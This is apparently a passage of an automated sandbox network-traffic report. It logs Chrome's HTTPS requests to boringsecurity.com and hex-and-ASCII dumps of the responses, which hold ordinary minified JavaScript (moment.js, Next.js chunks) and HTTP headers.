74 2c 6e 2c 73 29 7b 72 65 74 75 72 6e
                                                                          Data Ascii: .call(e)}function l(e,t){var n,s=[],i=e.length;for(n=0;n<i;++n)s.push(t(e[n],n));return s}function h(e,t){for(var n in t)i(t,n)&&(e[n]=t[n]);return i(t,"toString")&&(e.toString=t.toString),i(t,"valueOf")&&(e.valueOf=t.valueOf),e}function d(e,t,n,s){return
                                                                          2023-12-10 16:44:48 UTC538INData Raw: 30 2c 2d 32 29 7d 65 6c 73 65 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 61 5d 3b 75 2e 70 75 73 68 28 72 29 7d 4d 28 65 2b 22 5c 6e 41 72 67 75 6d 65 6e 74 73 3a 20 22 2b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 75 29 2e 6a 6f 69 6e 28 22 22 29 2b 22 5c 6e 22 2b 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 29 2c 73 3d 21 31 7d 72 65 74 75 72 6e 20 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 6e 29 7d 76 61 72 20 53 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 59 28 65 2c 6e 29 7b 6e 75 6c 6c 21 3d 74 2e 64 65 70 72 65 63 61 74 69 6f 6e 48 61 6e 64 6c 65 72 26 26 74 2e 64 65 70 72 65 63 61 74 69 6f 6e 48 61 6e 64 6c 65 72 28 65 2c 6e 29 2c 53 5b 65 5d 7c 7c 28 4d 28 6e 29 2c 53 5b 65 5d 3d 21 30 29 7d
                                                                          Data Ascii: 0,-2)}else r=arguments[a];u.push(r)}M(e+"\nArguments: "+Array.prototype.slice.call(u).join("")+"\n"+Error().stack),s=!1}return n.apply(this,arguments)},n)}var S={};function Y(e,n){null!=t.deprecationHandler&&t.deprecationHandler(e,n),S[e]||(M(n),S[e]=!0)}
                                                                          2023-12-10 16:44:48 UTC4744INData Raw: 6e 29 26 26 21 69 28 74 2c 6e 29 26 26 73 28 65 5b 6e 5d 29 26 26 28 72 5b 6e 5d 3d 68 28 7b 7d 2c 72 5b 6e 5d 29 29 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 6e 75 6c 6c 21 3d 65 26 26 74 68 69 73 2e 73 65 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 2c 6e 29 7b 76 61 72 20 73 3d 22 22 2b 4d 61 74 68 2e 61 62 73 28 65 29 2c 69 3d 74 2d 73 2e 6c 65 6e 67 74 68 3b 72 65 74 75 72 6e 28 65 3e 3d 30 3f 6e 3f 22 2b 22 3a 22 22 3a 22 2d 22 29 2b 4d 61 74 68 2e 70 6f 77 28 31 30 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 69 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 2e 73 75 62 73 74 72 28 31 29 2b 73 7d 74 2e 73 75 70 70 72 65 73 73 44 65 70 72 65 63 61 74 69 6f 6e 57 61 72 6e 69 6e 67 73 3d 21 31 2c 74 2e 64 65 70 72 65 63 61 74
                                                                          Data Ascii: n)&&!i(t,n)&&s(e[n])&&(r[n]=h({},r[n]));return r}function x(e){null!=e&&this.set(e)}function T(e,t,n){var s=""+Math.abs(e),i=t-s.length;return(e>=0?n?"+":"":"-")+Math.pow(10,Math.max(0,i)).toString().substr(1)+s}t.suppressDeprecationWarnings=!1,t.deprecat
                                                                          2023-12-10 16:44:48 UTC5930INData Raw: 20 74 2c 6e 2c 73 3d 5b 5d 2c 69 3d 5b 5d 2c 72 3d 5b 5d 3b 66 6f 72 28 74 3d 30 3b 74 3c 31 32 3b 74 2b 2b 29 6e 3d 64 28 5b 32 65 33 2c 74 5d 29 2c 73 2e 70 75 73 68 28 74 68 69 73 2e 6d 6f 6e 74 68 73 53 68 6f 72 74 28 6e 2c 22 22 29 29 2c 69 2e 70 75 73 68 28 74 68 69 73 2e 6d 6f 6e 74 68 73 28 6e 2c 22 22 29 29 2c 72 2e 70 75 73 68 28 74 68 69 73 2e 6d 6f 6e 74 68 73 28 6e 2c 22 22 29 29 2c 72 2e 70 75 73 68 28 74 68 69 73 2e 6d 6f 6e 74 68 73 53 68 6f 72 74 28 6e 2c 22 22 29 29 3b 66 6f 72 28 73 2e 73 6f 72 74 28 65 29 2c 69 2e 73 6f 72 74 28 65 29 2c 72 2e 73 6f 72 74 28 65 29 2c 74 3d 30 3b 74 3c 31 32 3b 74 2b 2b 29 73 5b 74 5d 3d 65 5f 28 73 5b 74 5d 29 2c 69 5b 74 5d 3d 65 5f 28 69 5b 74 5d 29 3b 66 6f 72 28 74 3d 30 3b 74 3c 32 34 3b 74 2b 2b
                                                                          Data Ascii: t,n,s=[],i=[],r=[];for(t=0;t<12;t++)n=d([2e3,t]),s.push(this.monthsShort(n,"")),i.push(this.months(n,"")),r.push(this.months(n,"")),r.push(this.monthsShort(n,""));for(s.sort(e),i.sort(e),r.sort(e),t=0;t<12;t++)s[t]=e_(s[t]),i[t]=e_(i[t]);for(t=0;t<24;t++
                                                                          2023-12-10 16:44:48 UTC7116INData Raw: 7d 29 2c 65 67 28 22 48 6d 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 73 3d 65 2e 6c 65 6e 67 74 68 2d 32 3b 74 5b 33 5d 3d 6a 28 65 2e 73 75 62 73 74 72 28 30 2c 73 29 29 2c 74 5b 34 5d 3d 6a 28 65 2e 73 75 62 73 74 72 28 73 29 29 7d 29 2c 65 67 28 22 48 6d 6d 73 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 73 3d 65 2e 6c 65 6e 67 74 68 2d 34 2c 69 3d 65 2e 6c 65 6e 67 74 68 2d 32 3b 74 5b 33 5d 3d 6a 28 65 2e 73 75 62 73 74 72 28 30 2c 73 29 29 2c 74 5b 34 5d 3d 6a 28 65 2e 73 75 62 73 74 72 28 73 2c 32 29 29 2c 74 5b 35 5d 3d 6a 28 65 2e 73 75 62 73 74 72 28 69 29 29 7d 29 3b 76 61 72 20 65 47 2c 65 41 2c 65 49 3d 5a 28 22 48 6f 75 72 73 22 2c 21 30 29 2c 65 6a 3d 7b 63 61 6c 65 6e 64 61 72 3a 7b 73 61
                                                                          Data Ascii: }),eg("Hmm",function(e,t,n){var s=e.length-2;t[3]=j(e.substr(0,s)),t[4]=j(e.substr(s))}),eg("Hmmss",function(e,t,n){var s=e.length-4,i=e.length-2;t[3]=j(e.substr(0,s)),t[4]=j(e.substr(s,2)),t[5]=j(e.substr(i))});var eG,eA,eI=Z("Hours",!0),ej={calendar:{sa
                                                                          2023-12-10 16:44:48 UTC8302INData Raw: 67 74 68 3b 6f 3c 6d 3b 6f 2b 2b 29 28 68 3d 6c 5b 6f 5d 2c 28 75 3d 28 5f 2e 6d 61 74 63 68 28 69 28 51 2c 68 29 3f 51 5b 68 5d 28 65 2e 5f 73 74 72 69 63 74 2c 65 2e 5f 6c 6f 63 61 6c 65 29 3a 52 65 67 45 78 70 28 65 5f 28 68 2e 72 65 70 6c 61 63 65 28 22 5c 5c 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 28 5c 5b 29 7c 5c 5c 28 5c 5d 29 7c 5c 5b 28 5b 5e 5c 5d 5c 5b 5d 2a 29 5c 5d 7c 5c 5c 28 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 73 2c 69 29 7b 72 65 74 75 72 6e 20 74 7c 7c 6e 7c 7c 73 7c 7c 69 7d 29 29 29 29 7c 7c 5b 5d 29 5b 30 5d 29 26 26 28 28 64 3d 5f 2e 73 75 62 73 74 72 28 30 2c 5f 2e 69 6e 64 65 78 4f 66 28 75 29 29 29 2e 6c 65 6e 67 74 68 3e 30 26 26 63 28 65 29 2e 75 6e 75 73 65 64 49 6e 70 75 74 2e 70 75 73 68 28
                                                                          Data Ascii: gth;o<m;o++)(h=l[o],(u=(_.match(i(Q,h)?Q[h](e._strict,e._locale):RegExp(e_(h.replace("\\","").replace(/\\(\[)|\\(\])|\[([^\]\[]*)\]|\\(.)/g,function(e,t,n,s,i){return t||n||s||i}))))||[])[0])&&((d=_.substr(0,_.indexOf(u))).length>0&&c(e).unusedInput.push(
                                                                          2023-12-10 16:44:48 UTC6188INData Raw: 79 4f 66 59 65 61 72 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 79 65 61 72 28 61 2e 67 65 74 55 54 43 46 75 6c 6c 59 65 61 72 28 29 29 2c 74 68 69 73 2e 6d 6f 6e 74 68 28 61 2e 67 65 74 55 54 43 4d 6f 6e 74 68 28 29 29 2c 74 68 69 73 2e 64 61 74 65 28 61 2e 67 65 74 55 54 43 44 61 74 65 28 29 29 2c 74 68 69 73 7d 43 28 22 4e 22 2c 30 2c 30 2c 22 65 72 61 41 62 62 72 22 29 2c 43 28 22 4e 4e 22 2c 30 2c 30 2c 22 65 72 61 41 62 62 72 22 29 2c 43 28 22 4e 4e 4e 22 2c 30 2c 30 2c 22 65 72 61 41 62 62 72 22 29 2c 43 28 22 4e 4e 4e 4e 22 2c 30 2c 30 2c 22 65 72 61 4e 61 6d 65 22 29 2c 43 28 22 4e 4e 4e 4e 4e 22 2c 30 2c 30 2c 22 65 72 61 4e 61 72 72 6f 77 22 29 2c 43 28 22 79 22 2c 5b 22 79 22 2c 31 5d 2c 22 79 6f 22 2c 22 65 72 61 59 65 61 72 22 29 2c 43 28 22
                                                                          Data Ascii: yOfYear);return this.year(a.getUTCFullYear()),this.month(a.getUTCMonth()),this.date(a.getUTCDate()),this}C("N",0,0,"eraAbbr"),C("NN",0,0,"eraAbbr"),C("NNN",0,0,"eraAbbr"),C("NNNN",0,0,"eraName"),C("NNNNN",0,0,"eraNarrow"),C("y",["y",1],"yo","eraYear"),C("
                                                                          2023-12-10 16:44:48 UTC10674INData Raw: 2e 76 61 6c 75 65 4f 66 28 29 29 7d 2c 74 49 2e 69 73 42 65 66 6f 72 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 6b 28 65 29 3f 65 3a 74 69 28 65 29 3b 72 65 74 75 72 6e 21 21 28 74 68 69 73 2e 69 73 56 61 6c 69 64 28 29 26 26 6e 2e 69 73 56 61 6c 69 64 28 29 29 26 26 28 22 6d 69 6c 6c 69 73 65 63 6f 6e 64 22 3d 3d 3d 28 74 3d 56 28 74 29 7c 7c 22 6d 69 6c 6c 69 73 65 63 6f 6e 64 22 29 3f 74 68 69 73 2e 76 61 6c 75 65 4f 66 28 29 3c 6e 2e 76 61 6c 75 65 4f 66 28 29 3a 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2e 65 6e 64 4f 66 28 74 29 2e 76 61 6c 75 65 4f 66 28 29 3c 6e 2e 76 61 6c 75 65 4f 66 28 29 29 7d 2c 74 49 2e 69 73 42 65 74 77 65 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 73 29 7b 76 61 72 20 69 3d 6b 28 65 29 3f 65 3a
                                                                          Data Ascii: .valueOf())},tI.isBefore=function(e,t){var n=k(e)?e:ti(e);return!!(this.isValid()&&n.isValid())&&("millisecond"===(t=V(t)||"millisecond")?this.valueOf()<n.valueOf():this.clone().endOf(t).valueOf()<n.valueOf())},tI.isBetween=function(e,t,n,s){var i=k(e)?e:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          83192.168.2.54981475.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:48 UTC564OUTGET /_next/static/chunks/514-a4b28d509d8a38e7.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:49 UTC423INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 35 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 27588Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:49 GMTEtag:
                                                                          2023-12-10 16:44:49 UTC763INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 34 5d 2c 7b 31 39 38 30 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3b 2f 2a 21 0a 20 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 38 20 4a 65 64 20 57 61 74 73 6f 6e 2e 0a 20 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 4d 49 54 29 2c 20 73 65 65 0a 20 20 68 74 74 70 3a 2f 2f 6a 65 64 77 61 74 73 6f 6e 2e 67 69 74 68 75 62 2e 69 6f 2f 63 6c 61 73 73 6e 61 6d 65 73 0a 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[514],{19803:function(e,t){var n;/*! Copyright (c) 2018 Jed Watson. Licensed under the MIT License (MIT), see http://jedwatson.github.io/classnames*/!function(){"use strict";var r={}.hasOwnPro
                                                                          2023-12-10 16:44:49 UTC2372INData Raw: 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 67 65 74 44 6f 6d 61 69 6e 4c 6f 63 61 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6f 29 7b 7b 6c 65 74 20 69 3d 6e 28 38 34 37 30 29 2e 6e 6f 72 6d 61 6c 69 7a 65 4c 6f 63 61 6c 65 50 61 74 68 2c 6c 3d 6e 28 37 32 30 37 37 29 2e 64 65 74 65 63 74 44 6f 6d 61 69 6e 4c 6f 63 61 6c 65 2c 61 3d 74 7c 7c 69 28 65 2c 72 29 2e 64 65 74 65 63 74 65 64 4c 6f 63 61 6c 65 2c 75 3d 6c 28 6f 2c 76 6f 69 64 20 30 2c 61 29 3b 69 66 28 75 29 7b 6c 65 74 20 74 3d 22 68 74 74 70 22 2e 63 6f 6e 63 61 74 28 75 2e 68 74 74 70 3f 22 22 3a 22 73 22 2c 22 3a 2f 2f 22 29 2c 6e 3d 61 3d 3d 3d 75 2e 64 65 66 61 75 6c 74
                                                                          Data Ascii: Object.defineProperty(t,"__esModule",{value:!0}),t.getDomainLocale=function(e,t,r,o){{let i=n(8470).normalizeLocalePath,l=n(72077).detectDomainLocale,a=t||i(e,r).detectedLocale,u=l(o,void 0,a);if(u){let t="http".concat(u.http?"":"s","://"),n=a===u.default
                                                                          2023-12-10 16:44:49 UTC538INData Raw: 61 2e 64 65 66 61 75 6c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 50 2c 7b 6c 6f 61 64 69 6e 67 3a 76 2c 77 69 64 74 68 3a 69 2c 68 65 69 67 68 74 3a 6f 2c 64 65 63 6f 64 69 6e 67 3a 22 61 73 79 6e 63 22 2c 22 64 61 74 61 2d 6e 69 6d 67 22 3a 70 3f 22 66 69 6c 6c 22 3a 22 31 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 73 2c 73 74 79 6c 65 3a 72 28 7b 7d 2c 63 2c 66 29 7d 2c 6e 2c 7b 72 65 66 3a 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 65 3d 3e 7b 74 26 26 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 28 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 2e 63 75 72 72 65 6e 74 3d 65 29 29 2c 65 26 26 28 78 26 26 28 65 2e 73 72 63 3d 65 2e 73
                                                                          Data Ascii: a.default.createElement("img",Object.assign({},P,{loading:v,width:i,height:o,decoding:"async","data-nimg":p?"fill":"1",className:s,style:r({},c,f)},n,{ref:a.useCallback(e=>{t&&("function"==typeof t?t(e):"object"==typeof t&&(t.current=e)),e&&(x&&(e.src=e.s
                                                                          2023-12-10 16:44:49 UTC4744INData Raw: 68 74 3a 4f 2c 66 69 6c 6c 3a 78 2c 73 74 79 6c 65 3a 50 2c 6f 6e 4c 6f 61 64 3a 54 2c 6f 6e 4c 6f 61 64 69 6e 67 43 6f 6d 70 6c 65 74 65 3a 5f 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 52 3d 22 65 6d 70 74 79 22 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 4d 2c 6c 61 79 6f 75 74 3a 4c 2c 6f 62 6a 65 63 74 46 69 74 3a 6b 2c 6f 62 6a 65 63 74 50 6f 73 69 74 69 6f 6e 3a 7a 2c 6c 61 7a 79 42 6f 75 6e 64 61 72 79 3a 46 2c 6c 61 7a 79 52 6f 6f 74 3a 41 7d 3d 65 2c 4e 3d 6c 28 65 2c 5b 22 73 72 63 22 2c 22 73 69 7a 65 73 22 2c 22 75 6e 6f 70 74 69 6d 69 7a 65 64 22 2c 22 70 72 69 6f 72 69 74 79 22 2c 22 6c 6f 61 64 69 6e 67 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 71 75 61 6c 69 74 79 22 2c 22 77 69 64 74 68 22 2c 22 68 65 69 67 68 74 22 2c 22 66 69 6c 6c 22 2c 22
                                                                          Data Ascii: ht:O,fill:x,style:P,onLoad:T,onLoadingComplete:_,placeholder:R="empty",blurDataURL:M,layout:L,objectFit:k,objectPosition:z,lazyBoundary:F,lazyRoot:A}=e,N=l(e,["src","sizes","unoptimized","priority","loading","className","quality","width","height","fill","
                                                                          2023-12-10 16:44:49 UTC5930INData Raw: 69 64 20 30 2c 69 3d 74 2b 22 25 22 2b 6e 2b 22 25 22 2b 6f 3b 69 66 28 6d 2e 68 61 73 28 69 29 29 72 65 74 75 72 6e 3b 6d 2e 61 64 64 28 69 29 7d 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 65 2e 70 72 65 66 65 74 63 68 28 74 2c 6e 2c 72 29 29 2e 63 61 74 63 68 28 65 3d 3e 7b 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 75 2e 66 6f 72 6d 61 74 55 72 6c 28 65 29 7d 6c 65 74 20 79 3d 69 2e 64 65 66 61 75 6c 74 2e 66 6f 72 77 61 72 64 52 65 66 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 2c 72 3b 6c 65 74 7b 68 72 65 66 3a 75 2c 61 73 3a 6d 2c 63 68 69 6c 64 72 65 6e 3a 79 2c 70 72 65 66 65 74 63 68 3a 45 2c 70 61 73 73 48 72 65 66 3a 77 2c 72 65 70
                                                                          Data Ascii: id 0,i=t+"%"+n+"%"+o;if(m.has(i))return;m.add(i)}Promise.resolve(e.prefetch(t,n,r)).catch(e=>{})}}function b(e){return"string"==typeof e?e:u.formatUrl(e)}let y=i.default.forwardRef(function(e,t){let n,r;let{href:u,as:m,children:y,prefetch:E,passHref:w,rep
                                                                          2023-12-10 16:44:49 UTC2037INData Raw: 75 72 6c 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 2c 22 26 77 3d 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 26 71 3d 22 29 2e 63 6f 6e 63 61 74 28 6f 7c 7c 37 35 29 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 2c 6e 2e 5f 5f 6e 65 78 74 5f 69 6d 67 5f 64 65 66 61 75 6c 74 3d 21 30 2c 74 2e 64 65 66 61 75 6c 74 3d 6e 7d 2c 34 30 31 39 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 2e 65 78 70 6f 72 74 73 3d 6e 28 31 33 39 35 38 29 7d 2c 36 35 32 38 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 65 2e 65 78 70 6f 72 74 73 3d 6e 28 32 34 39
                                                                          Data Ascii: url=").concat(encodeURIComponent(n),"&w=").concat(r,"&q=").concat(o||75)}Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0,n.__next_img_default=!0,t.default=n},40196:function(e,t,n){e.exports=n(13958)},65282:function(e,t,n){e.exports=n(249
                                                                          2023-12-10 16:44:49 UTC8302INData Raw: 75 73 65 52 65 66 29 28 5b 5d 29 2c 6f 3d 63 28 29 2c 61 3d 62 28 29 2c 73 3d 28 30 2c 79 2e 7a 29 28 28 65 2c 74 3d 6c 2e 6c 34 2e 48 69 64 64 65 6e 29 3d 3e 7b 6c 65 74 20 69 3d 72 2e 63 75 72 72 65 6e 74 2e 66 69 6e 64 49 6e 64 65 78 28 28 7b 65 6c 3a 74 7d 29 3d 3e 74 3d 3d 3d 65 29 3b 2d 31 21 3d 3d 69 26 26 28 28 30 2c 75 2e 45 29 28 74 2c 7b 5b 6c 2e 6c 34 2e 55 6e 6d 6f 75 6e 74 5d 28 29 7b 72 2e 63 75 72 72 65 6e 74 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 5b 6c 2e 6c 34 2e 48 69 64 64 65 6e 5d 28 29 7b 72 2e 63 75 72 72 65 6e 74 5b 69 5d 2e 73 74 61 74 65 3d 22 68 69 64 64 65 6e 22 7d 7d 29 2c 61 2e 6d 69 63 72 6f 54 61 73 6b 28 28 29 3d 3e 7b 76 61 72 20 65 3b 21 53 28 72 29 26 26 6f 2e 63 75 72 72 65 6e 74 26 26 28 6e 75 6c 6c 3d 3d 28 65 3d
                                                                          Data Ascii: useRef)([]),o=c(),a=b(),s=(0,y.z)((e,t=l.l4.Hidden)=>{let i=r.current.findIndex(({el:t})=>t===e);-1!==i&&((0,u.E)(t,{[l.l4.Unmount](){r.current.splice(i,1)},[l.l4.Hidden](){r.current[i].state="hidden"}}),a.microTask(()=>{var e;!S(r)&&o.current&&(null==(e=
                                                                          2023-12-10 16:44:49 UTC2902INData Raw: 28 6f 2c 72 29 2c 6f 7d 6e 2e 64 28 74 2c 7b 45 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 7d 2c 33 34 32 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 41 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 6c 34 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 2c 73 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 79 56 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 7d 29 3b 76 61 72 20 72 2c 6f 2c 69 3d 6e 28 35 30 39 35 39 29 2c 6c 3d 6e 28 33 39 36 33 39 29 2c 61 3d 28 28 72 3d 61 7c 7c 7b 7d 29 5b 72 2e 4e 6f 6e 65 3d 30 5d 3d 22 4e 6f 6e 65 22 2c 72 5b 72 2e 52 65 6e 64 65 72 53 74 72 61 74
                                                                          Data Ascii: (o,r),o}n.d(t,{E:function(){return r}})},3428:function(e,t,n){"use strict";n.d(t,{AN:function(){return a},l4:function(){return u},sY:function(){return s},yV:function(){return d}});var r,o,i=n(50959),l=n(39639),a=((r=a||{})[r.None=0]="None",r[r.RenderStrat


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          84192.168.2.54981575.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:49 UTC649OUTGET /images/BoringSecurityMurAll.png HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/_next/static/css/ad4aef9984e4c1fd.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:49 UTC395INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 33 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 36 39 33 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 39 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 61 31 62 36 36 33 38 36 65 31 31 30 63 38 62 39 38 30 38 65 61 64 61 61 36 32 30
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50923Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 869348Content-Type: image/pngDate: Sun, 10 Dec 2023 16:44:49 GMTEtag: "a1b66386e110c8b9808eadaa620
